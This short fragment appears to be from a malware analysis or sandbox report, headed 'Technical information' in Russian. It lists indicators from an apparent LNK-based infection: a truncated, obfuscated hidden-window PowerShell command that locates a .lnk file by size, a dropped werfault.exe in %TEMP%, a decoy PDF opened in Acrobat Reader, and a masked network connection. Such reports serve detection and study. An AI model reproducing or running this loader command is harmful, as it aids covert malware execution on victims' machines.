Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden $0dda91a21b6f6536715eb83f21c75451 = G''et-Chil''dItem *.lnk | where-object {$_.length -eq 0x000449C8} | S''elect-Objec''t -ExpandProperty Name; $bdf6730d5c52821e237a7ceb47d8...
- '%TEMP%\werfault.exe'
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%TEMP%\7.pdf"
- %TEMP%\werfault.exe
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net